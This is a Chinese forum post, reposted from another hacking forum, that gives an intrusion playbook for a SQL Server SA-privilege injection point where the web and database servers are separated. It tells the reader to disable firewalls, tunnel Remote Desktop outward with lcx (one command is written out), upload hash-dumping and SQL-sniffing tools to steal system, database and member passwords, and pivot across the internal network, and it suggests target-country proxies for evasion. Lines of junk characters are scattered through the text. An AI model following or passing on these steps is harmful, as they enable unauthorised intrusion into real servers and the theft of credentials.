当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。1 z1 C4 S( Q9 J9 Q
C6 ~9 W% g* Q" L: m# q
6 H# V, h c" C) ]
9 a3 v& p: c) Z5 i- J9 n$ nSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)1 i; F7 S7 }4 u. D& H4 i- c* i
3 M6 B& n e2 t. y! y
4 {- I/ `2 K% }3 I& |- ]0 ^一、DB机有公网IP.
% W8 g5 m1 v, U4 C; e
8 {0 \- g7 R. e# i, q. o: l1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.4 J/ b5 M& B4 V$ w
4 a8 @, P/ \) Y0 U8 O
; Q( n! U! a+ B# Y7 F. Q' n8 D3 r
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
% q" d0 i/ o6 C- b( |* a' G2 {: t/ ]$ Q! T$ j6 l5 O F$ k
. L2 `, [6 @4 M: b, i9 `4 l3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
+ j; N( B0 L m" r) H( w' x) j+ L0 S& X
3 k) {! k5 b: {% e
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
1 j0 ^/ p6 r/ Q. w# W- A0 k, I+ W# s! u7 U! s
3 C" _' a" Z8 j8 K1 t! L! J7 E! S6 q& M+ C$ S# y9 l$ E
二、DB机只有内网IP
( M) ?8 D1 Q. \9 p. @$ G4 _5 x6 b3 {7 o
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等. e8 G: N5 i( ]* Q
2 ?2 e: p( I1 W* @9 p. t" S5 e5 m8 K6 g8 |
2:停掉防火墙和IP策略再从内往外扫描.
8 K3 w$ K5 U8 G) R# N
) e8 I$ ?) ]" \' O2 }+ H
: a; z, u: B; h" _/ ]3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
0 @9 U3 w6 j9 F6 I" ?. `+ t7 ~# p
0 U* ~: h! T4 x- J0 W
! X5 D2 _2 I" v% U5 ]4:学会密码规律分析往往会有惊喜.
/ m7 J& t% F" w F: o$ Q2 v' K: g0 T% \" Q0 r
/ m5 |3 o1 I+ x. y5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等9 B! M! W% \3 }9 z) V, n3 w
( \$ q; R! i0 F' L' `
6 j) y# t5 u0 }- A/ ]- W有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |